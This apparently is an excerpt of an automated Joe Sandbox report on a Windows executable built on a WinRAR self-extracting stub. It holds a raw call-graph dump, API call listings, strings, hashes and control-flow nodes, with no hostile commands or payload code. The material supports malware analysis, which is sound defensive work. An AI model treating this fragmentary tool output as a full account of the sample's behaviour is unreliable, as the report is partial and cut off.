SetWindowTextW SendMessageW 23007->23010 23013 a0c327 SendMessageW 23007->23013 23018 a017ac CompareStringW 23007->23018 23019 a0aa36 23007->23019 23023 a09da4 GetCurrentDirectoryW 23007->23023 23028 9fa52a 7 API calls 23007->23028 23029 9fa4b3 FindClose 23007->23029 23030 a0ab9a 76 API calls ___std_exception_copy 23007->23030 23031 a135de 23007->23031 23009->23007 23011 a0bfe8 23009->23011 23010->23007 23025 9f400a 23011->23025 23013->23007 23015 a0c01d MoveFileW 23015->23007 23016 a0c035 MoveFileExW 23015->23016 23016->23007 23017->23006 23017->23007 23024 9fb4f7 52 API calls 2 library calls 23017->23024 23018->23007 23020 a0aa40 23019->23020 23021 a0aaf3 ExpandEnvironmentStringsW 23020->23021 23022 a0ab16 23020->23022 23021->23022 23022->23007 23023->23007 23024->23017 23067 9f3fdd 23025->23067 23028->23007 23029->23007 23030->23007 23032 a18606 23031->23032 23033 a18613 23032->23033 23034 a1861e 23032->23034 23139 a18518 23033->23139 23036 a18626 23034->23036 23042 a1862f ___InternalCxxFrameHandler 23034->23042 23037 a184de _free 20 API calls 23036->23037 23040 a1861b 23037->23040 23038 a18634 23146 a1895a 20 API calls __dosmaperr 23038->23146 23039 a18659 HeapReAlloc 23039->23040 23039->23042 23040->23007 23042->23038 23042->23039 23147 a171ad 7 API calls 2 library calls 23042->23147 23046 a0ce2c ___scrt_get_show_window_mode 23044->23046 23045 a0d08a 23045->22991 23046->23045 23047 a0cf1b 23046->23047 23153 a017ac CompareStringW 23046->23153 23150 9fa180 23047->23150 23051 a0cf4f ShellExecuteExW 23051->23045 23058 a0cf62 23051->23058 23053 a0cf47 23053->23051 23054 a0cf9b 23155 a0d2e6 6 API calls 23054->23155 23055 a0cff1 CloseHandle 23056 a0d00a 23055->23056 23057 a0cfff 23055->23057 23056->23045 23063 a0d081 ShowWindow 23056->23063 23156 a017ac CompareStringW 23057->23156 23058->23054 23058->23055 23059 a0cf91 ShowWindow 23058->23059 23059->23054 23062 a0cfb3 23062->23055 23064 a0cfc6 GetExitCodeProcess 23062->23064 23063->23045 23064->23055 23065 a0cfd9 23064->23065 23065->23055 23068 9f3ff4 __vswprintf_c_l 23067->23068 23071 a15759 23068->23071 23074 a13837 23071->23074 23075 a13877 23074->23075 23076 a1385f 23074->23076 23075->23076 23078 a1387f 23075->23078 23091 a1895a 20 API calls __dosmaperr 23076->23091 23093 a13dd6 23078->23093 23079 a13864 23092 a18839 26 API calls pre_c_initialization 23079->23092 23083 a0ec4a DloadUnlock 5 API calls 23085 9f3ffe GetFileAttributesW 23083->23085 23085->23011 23085->23015 23086 a13907 23102 a14186 51 API calls 3 library calls 23086->23102 23089 a13912 23103 a13e59 20 API calls _free 23089->23103 23090 a1386f 23090->23083 23091->23079 23092->23090 23094 a13df3 23093->23094 23100 a1388f 23093->23100 23094->23100 23104 a18fa5 GetLastError 23094->23104 23096 a13e14 23125 a190fa 38 API calls __cftof 23096->23125 23098 a13e2d 23126 a19127 38 API calls __cftof 23098->23126 23101 a13da1 20 API calls 2 library calls 23100->23101 23101->23086 23102->23089 23103->23090 23105 a18fc7 23104->23105 23106 a18fbb 23104->23106 23128 a185a9 20 API calls 3 library calls 23105->23128 23127 a1a61b 11 API calls 2 library calls 23106->23127 23109 a18fc1 23109->23105 23111 a19010 SetLastError 23109->23111 23110 a18fd3 23112 a18fdb 23110->23112 23135 a1a671 11 API calls 2 library calls 23110->23135 23111->23096 23129 a184de 23112->23129 23114 a18ff0 23114->23112 23116 a18ff7 23114->23116 23136 a18e16 20 API calls __dosmaperr 23116->23136 23117 a18fe1 23119 a1901c SetLastError 23117->23119 23137 a18566 38 API calls _abort 23119->23137 23120 a19002 23122 a184de _free 20 API calls 23120->23122 23124 a19009 23122->23124 23124->23111 23124->23119 23125->23098 23126->23100 23127->23109 23128->23110 23130 a18512 __dosmaperr 23129->23130 23131 a184e9 RtlFreeHeap 23129->23131 23130->23117 23131->23130 23132 a184fe 23131->23132 23138 a1895a 20 API calls __dosmaperr 23132->23138 23134 a18504 GetLastError 23134->23130 23135->23114 23136->23120 23138->23134 23140 a18556 23139->23140 23145 a18526 ___InternalCxxFrameHandler 23139->23145 23149 a1895a 20 API calls __dosmaperr 23140->23149 23142 a18541 RtlAllocateHeap 23143 a18554 23142->23143 23142->23145 23143->23040 23145->23140 23145->23142 23148 a171ad 7 API calls 2 library calls 23145->23148 23146->23040 23147->23042 23148->23145 23149->23143 23157 9fa194 23150->23157 23153->23047 23154 9fb239 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW CharUpperW 23154->23053 23155->23062 23156->23056 23165 a0e360 23157->23165 23160 9fa189 23160->23051 23160->23154 23161 9fa1b2 23167 9fb66c 23161->23167 23163 9fa1c6 23163->23160 23164 9fa1ca GetFileAttributesW 23163->23164 23164->23160 23166 9fa1a1 GetFileAttributesW 23165->23166 23166->23160 23166->23161 23168 9fb679 23167->23168 23176 9fb683 23168->23176 23177 9fb806 CharUpperW 23168->23177 23170 9fb692 23178 9fb832 CharUpperW 23170->23178 23172 9fb6a1 23173 9fb71c GetCurrentDirectoryW 23172->23173 23174 9fb6a5 23172->23174 23173->23176 23179 9fb806 CharUpperW 23174->23179 23176->23163 23177->23170 23178->23172 23179->23176 23181 9f9f2f 23182 9f9f3d 23181->23182 23183 9f9f44 23181->23183 23184 9f9f4a GetStdHandle 23183->23184 23191 9f9f55 23183->23191 23184->23191 23185 9f9fa9 WriteFile 23185->23191 23186 9f9f7c WriteFile 23187 9f9f7a 23186->23187 23186->23191 23187->23186 23187->23191 23189 9fa031 23193 9f7061 75 API calls 23189->23193 23191->23182 23191->23185 23191->23186 23191->23187 23191->23189 23192 9f6e18 60 API calls 23191->23192 23192->23191 23193->23182 24819 a1b710 GetProcessHeap 24762 9f1025 29 API calls pre_c_initialization 24821 a0be49 108 API calls 4 library calls 24764 a0fc60 51 API calls 2 library calls 24766 a13460 RtlUnwind 24767 a19c60 71 API calls _free 24768 a19e60 31 API calls 2 library calls 24088 9f9b59 24089 9f9bd7 24088->24089 24092 9f9b63 24088->24092 24090 9f9bad SetFilePointer 24090->24089 24091 9f9bcd GetLastError 24090->24091 24091->24089 24092->24090 24112 a0d573 24113 a0d580 24112->24113 24114 9fddd1 53 API calls 24113->24114 24115 a0d594 24114->24115 24116 9f400a _swprintf 51 API calls 24115->24116 24117 a0d5a6 SetDlgItemTextW 24116->24117 24118 a0ac74 5 API calls 24117->24118 24119 a0d5c3 24118->24119 24773 a05c77 121 API calls __vsnwprintf_l 24775 a0ec40 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 24776 a08c40 GetClientRect 24777 a13040 5 API calls 2 library calls 24823 a0be49 98 API calls 3 library calls 24778 a20040 IsProcessorFeaturePresent 24779 9f1075 82 API calls pre_c_initialization 24824 a0d34e DialogBoxParamW 24825 a09b50 GdipDisposeImage GdipFree __except_handler4 24781 a18050 8 API calls ___vcrt_uninitialize

                  Executed Functions

                  Function 00A0D5D4 Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 197filesleeptimeCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                    • Part of subcall function 00A000CF: GetModuleHandleW.KERNEL32(kernel32), ref: 00A000E4
                    • Part of subcall function 00A000CF: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00A000F6
                    • Part of subcall function 00A000CF: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00A00127
                    • Part of subcall function 00A09DA4: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00A09DAC
                    • Part of subcall function 00A0A335: OleInitialize.OLE32(00000000), ref: 00A0A34E
                    • Part of subcall function 00A0A335: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00A0A385
                    • Part of subcall function 00A0A335: SHGetMalloc.SHELL32(00A38430), ref: 00A0A38F
                    • Part of subcall function 00A013B3: GetCPInfo.KERNEL32(00000000,?), ref: 00A013C4
                    • Part of subcall function 00A013B3: IsDBCSLeadByte.KERNEL32(00000000), ref: 00A013D8
                  • GetCommandLineW.KERNEL32 ref: 00A0D61C
                  • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 00A0D643
                  • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 00A0D654
                  • UnmapViewOfFile.KERNEL32(00000000), ref: 00A0D68E
                    • Part of subcall function 00A0D287: SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 00A0D29D
                    • Part of subcall function 00A0D287: SetEnvironmentVariableW.KERNELBASE(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00A0D2D9
                  • CloseHandle.KERNEL32(00000000), ref: 00A0D697
                  • GetModuleFileNameW.KERNEL32(00000000,00A4DC90,00000800), ref: 00A0D6B2
                  • SetEnvironmentVariableW.KERNEL32(sfxname,00A4DC90), ref: 00A0D6BE
                  • GetLocalTime.KERNEL32(?), ref: 00A0D6C9
                  • _swprintf.LIBCMT ref: 00A0D708
                  • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00A0D71A
                  • GetModuleHandleW.KERNEL32(00000000), ref: 00A0D721
                  • LoadIconW.USER32(00000000,00000064), ref: 00A0D738
                  • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001AEE0,00000000), ref: 00A0D789
                  • Sleep.KERNEL32(?), ref: 00A0D7B7
                  • DeleteObject.GDI32 ref: 00A0D7F0
                  • DeleteObject.GDI32(?), ref: 00A0D800
                  • CloseHandle.KERNEL32 ref: 00A0D843
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$ByteCommandCurrentDialogDirectoryGdiplusIconInfoInitializeLeadLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                  • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                  • API String ID: 788466649-3743209390
                  • Opcode ID: 5a1b850f644c75d8d7e8260e21b21b129fffa098cc1b86d2b5b8d6cb3c640c29
                  • Instruction ID: 78170d27319e09763b92f8994323f429123da9995621b6e7fa51efafbf044fbd
                  • Opcode Fuzzy Hash: 5a1b850f644c75d8d7e8260e21b21b129fffa098cc1b86d2b5b8d6cb3c640c29
                  • Instruction Fuzzy Hash: 6E61D276904358AFD720EBE8FD49F7B37A8BB86741F000428F545921D1DBB9C906CBA2
                  Function 00A09E1C Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 100memorywindowCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 770 a09e1c-a09e38 FindResourceW 771 a09e3e-a09e50 SizeofResource 770->771 772 a09f2f-a09f32 770->772 773 a09e70-a09e72 771->773 774 a09e52-a09e61 LoadResource 771->774 776 a09f2e 773->776 774->773 775 a09e63-a09e6e LockResource 774->775 775->773 777 a09e77-a09e8c GlobalAlloc 775->777 776->772 778 a09e92-a09e9b GlobalLock 777->778 779 a09f28-a09f2d 777->779 780 a09f21-a09f22 GlobalFree 778->780 781 a09ea1-a09ebf call a0f4b0 778->781 779->776 780->779 785 a09ec1-a09ee3 call a09d7b 781->785 786 a09f1a-a09f1b GlobalUnlock 781->786 785->786 791 a09ee5-a09eed 785->791 786->780 792 a09f08-a09f16 791->792 793 a09eef-a09f03 GdipCreateHBITMAPFromBitmap 791->793 792->786 793->792 794 a09f05 793->794 794->792
                  APIs
                  • FindResourceW.KERNEL32(00A0AE4D,PNG,?,?,?,00A0AE4D,00000066), ref: 00A09E2E
                  • SizeofResource.KERNEL32(00000000,00000000,?,?,?,00A0AE4D,00000066), ref: 00A09E46
                  • LoadResource.KERNEL32(00000000,?,?,?,00A0AE4D,00000066), ref: 00A09E59
                  • LockResource.KERNEL32(00000000,?,?,?,00A0AE4D,00000066), ref: 00A09E64
                  • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00A0AE4D,00000066), ref: 00A09E82
                  • GlobalLock.KERNEL32(00000000,?,?,?,?,?,00A0AE4D,00000066), ref: 00A09E93
                  • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00A09EFC
                  • GlobalUnlock.KERNEL32(00000000), ref: 00A09F1B
                  • GlobalFree.KERNEL32(00000000), ref: 00A09F22
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: GlobalResource$Lock$AllocBitmapCreateFindFreeFromGdipLoadSizeofUnlock
                  • String ID: PNG
                  • API String ID: 4097654274-364855578
                  • Opcode ID: b9c0bdd06843b9fec36c341ffc045b9dc9a58912d18bea50e7a72ab8a7d20c87
                  • Instruction ID: b8091240701ae4fe42b107d20e40ac0a28ed26cc01d28355a362c7047582b795
                  • Opcode Fuzzy Hash: b9c0bdd06843b9fec36c341ffc045b9dc9a58912d18bea50e7a72ab8a7d20c87
                  • Instruction Fuzzy Hash: 5931A77220431AAFCB20DF65EC48D2BBBADFF86751B044528F902D22A1DB35DC12CB60
                  Function 009FA5F4 Relevance: 7.6, APIs: 5, Instructions: 107fileCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 971 9fa5f4-9fa61f call a0e360 974 9fa691-9fa69a FindNextFileW 971->974 975 9fa621-9fa632 FindFirstFileW 971->975 976 9fa69c-9fa6aa GetLastError 974->976 977 9fa6b0-9fa6b2 974->977 978 9fa6b8-9fa75c call 9ffe56 call 9fbcfb call a00e19 * 3 975->978 979 9fa638-9fa64f call 9fb66c 975->979 976->977 977->978 980 9fa761-9fa774 977->980 978->980 986 9fa66a-9fa673 GetLastError 979->986 987 9fa651-9fa668 FindFirstFileW 979->987 989 9fa675-9fa678 986->989 990 9fa684 986->990 987->978 987->986 989->990 992 9fa67a-9fa67d 989->992 993 9fa686-9fa68c 990->993 992->990 995 9fa67f-9fa682 992->995 993->980 995->993
                  APIs
                  • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,009FA4EF,000000FF,?,?), ref: 009FA628
                  • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,009FA4EF,000000FF,?,?), ref: 009FA65E
                  • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,009FA4EF,000000FF,?,?), ref: 009FA66A
                  • FindNextFileW.KERNEL32(?,?,?,?,?,?,009FA4EF,000000FF,?,?), ref: 009FA692
                  • GetLastError.KERNEL32(?,?,?,?,009FA4EF,000000FF,?,?), ref: 009FA69E
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: FileFind$ErrorFirstLast$Next
                  • String ID:
                  • API String ID: 869497890-0
                  • Opcode ID: 59b8de0c727396526a06f892c3379b0389c53afa87d28b11756e2577929a8365
                  • Instruction ID: 5481f58c8300160fb6d8d6566c51c0656dcbbe103acbc2d6bc027d256a294c2a
                  • Opcode Fuzzy Hash: 59b8de0c727396526a06f892c3379b0389c53afa87d28b11756e2577929a8365
                  • Instruction Fuzzy Hash: B341A772504645AFC724EF78C884AEAF7ECBF49354F040929F6DDD3240D734A9558B52
                  Function 00A1753D Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • GetCurrentProcess.KERNEL32(00000000,?,00A17513,00000000,00A2BAD8,0000000C,00A1766A,00000000,00000002,00000000), ref: 00A1755E
                  • TerminateProcess.KERNEL32(00000000,?,00A17513,00000000,00A2BAD8,0000000C,00A1766A,00000000,00000002,00000000), ref: 00A17565
                  • ExitProcess.KERNEL32 ref: 00A17577
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: Process$CurrentExitTerminate
                  • String ID:
                  • API String ID: 1703294689-0
                  • Opcode ID: 99c23127ddd1d81480a737299e329c196a5eebbedf77f6c444af296b6d2b597f
                  • Instruction ID: 2f50d13d0d8ffc9b6a4f6b855dccd79693e0247d62be76250fd59cba9acce942
                  • Opcode Fuzzy Hash: 99c23127ddd1d81480a737299e329c196a5eebbedf77f6c444af296b6d2b597f
                  • Instruction Fuzzy Hash: DDE0BF32104544ABCF21EF58DE09A993B7AEF51791F104424F9064A132CB39DE93CA51
                  Function 009F857B Relevance: 3.9, APIs: 2, Instructions: 947COMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: H_prolog_memcmp
                  • String ID:
                  • API String ID: 3004599000-0
                  • Opcode ID: 139347f17635e67b6e5c8112dff8162f533576b5cb82e0509f7896a2ab5e33f7
                  • Instruction ID: 41a9aa34c981961fe4714a9c775c2e216f9f1b6e49f99be6ca7941bf61450737
                  • Opcode Fuzzy Hash: 139347f17635e67b6e5c8112dff8162f533576b5cb82e0509f7896a2ab5e33f7
                  • Instruction Fuzzy Hash: 23821C7090424DAEDF65DF64C885BFBBBBDAF15300F0845B9EA599B182DF305A48CB60
                  Function 00A0AEE0 Relevance: 98.7, APIs: 47, Strings: 9, Instructions: 724COMMON
                  Download Yara Rule
                  APIs
                  • __EH_prolog.LIBCMT ref: 00A0AEE5
                    • Part of subcall function 009F130B: GetDlgItem.USER32(00000000,00003021), ref: 009F134F
                    • Part of subcall function 009F130B: SetWindowTextW.USER32(00000000,00A235B4), ref: 009F1365
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: H_prologItemTextWindow
                  • String ID: "%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                  • API String ID: 810644672-8108337
                  • Opcode ID: ba8e6ec94e65f036406c9d7a05ca29afae44676f6c1401dfc6046d591c298a5e
                  • Instruction ID: 65a96c63dc32865d27163ac2e2efdea699802648c6ed41edf0fc5fdfb36504b4
                  • Opcode Fuzzy Hash: ba8e6ec94e65f036406c9d7a05ca29afae44676f6c1401dfc6046d591c298a5e
                  • Instruction Fuzzy Hash: 0342E071954359BEEB21EBF0AE8AFBE7B7CAB12701F004154F245A60E1CB784946CB71
                  Function 00A000CF Relevance: 51.1, APIs: 22, Strings: 7, Instructions: 317libraryfileloaderCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 257 a000cf-a000ee call a0e360 GetModuleHandleW 260 a000f0-a00107 GetProcAddress 257->260 261 a00154-a003b2 257->261 264 a00121-a00131 GetProcAddress 260->264 265 a00109-a0011f 260->265 262 a00484-a004b3 GetModuleFileNameW call 9fbc85 call 9ffe56 261->262 263 a003b8-a003c3 call a170dd 261->263 278 a004b5-a004bf call 9facf5 262->278 263->262 273 a003c9-a003fa GetModuleFileNameW CreateFileW 263->273 264->261 268 a00133-a00152 264->268 265->264 268->261 276 a00478-a0047f CloseHandle 273->276 277 a003fc-a0040a SetFilePointer 273->277 276->262 277->276 279 a0040c-a00429 ReadFile 277->279 285 a004c1-a004c5 call a00085 278->285 286 a004cc 278->286 279->276 282 a0042b-a00450 279->282 284 a0046d-a00476 call 9ffbd8 282->284 284->276 294 a00452-a0046c call a00085 284->294 291 a004ca 285->291 289 a004ce-a004d0 286->289 292 a004f2-a00518 call 9fbcfb GetFileAttributesW 289->292 293 a004d2-a004f0 CompareStringW 289->293 291->289 296 a0051a-a0051e 292->296 301 a00522 292->301 293->292 293->296 294->284 296->278 298 a00520 296->298 302 a00526-a00528 298->302 301->302 303 a00560-a00562 302->303 304 a0052a 302->304 306 a00568-a0057f call 9fbccf call 9facf5 303->306 307 a0066f-a00679 303->307 305 a0052c-a00552 call 9fbcfb GetFileAttributesW 304->305 312 a00554-a00558 305->312 313 a0055c 305->313 317 a00581-a005e2 call a00085 * 2 call 9fddd1 call 9f400a call 9fddd1 call a09f35 306->317 318 a005e7-a0061a call 9f400a AllocConsole 306->318 312->305 316 a0055a 312->316 313->303 316->303 323 a00667-a00669 ExitProcess 317->323 318->323 324 a0061c-a00661 GetCurrentProcessId AttachConsole call a135b3 GetStdHandle WriteConsoleW Sleep FreeConsole 318->324 324->323
                  APIs
                  • GetModuleHandleW.KERNEL32(kernel32), ref: 00A000E4
                  • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00A000F6
                  • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00A00127
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00A003D4
                  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00A003F0
                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00A00402
                  • ReadFile.KERNEL32(00000000,?,00007FFE,00A23BA4,00000000), ref: 00A00421
                  • CloseHandle.KERNEL32(00000000), ref: 00A00479
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00A0048F
                  • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,?,00000000,?,00000800), ref: 00A004E7
                  • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00000000,?,00000800), ref: 00A00510
                  • GetFileAttributesW.KERNEL32(?,?,?,00000800), ref: 00A0054A
                    • Part of subcall function 00A00085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00A000A0
                    • Part of subcall function 00A00085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,009FEB86,Crypt32.dll,00000000,009FEC0A,?,?,009FEBEC,?,?,?), ref: 00A000C2
                  • _swprintf.LIBCMT ref: 00A005BE
                  • _swprintf.LIBCMT ref: 00A0060A
                    • Part of subcall function 009F400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 009F401D
                  • AllocConsole.KERNEL32 ref: 00A00612
                  • GetCurrentProcessId.KERNEL32 ref: 00A0061C
                  • AttachConsole.KERNEL32(00000000), ref: 00A00623
                  • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00A00649
                  • WriteConsoleW.KERNEL32(00000000), ref: 00A00650
                  • Sleep.KERNEL32(00002710), ref: 00A0065B
                  • FreeConsole.KERNEL32 ref: 00A00661
                  • ExitProcess.KERNEL32 ref: 00A00669
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l
                  • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
                  • API String ID: 1201351596-3298887752
                  • Opcode ID: 852856e0099cf4f3bda12869e32ddf52f69e38db9130d0f11115bd4bb0e8cac6
                  • Instruction ID: e7c7963295af2ed228d03db035b02631b58b08c5df3c3347df86d527f5103c1b
                  • Opcode Fuzzy Hash: 852856e0099cf4f3bda12869e32ddf52f69e38db9130d0f11115bd4bb0e8cac6
                  • Instruction Fuzzy Hash: 64D17872108354ABDB30DF58F949FAFB6E8BF86704F00492DF68596180D7B886498F66
                  Function 00A0BDF5 Relevance: 31.9, APIs: 14, Strings: 4, Instructions: 429windowCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
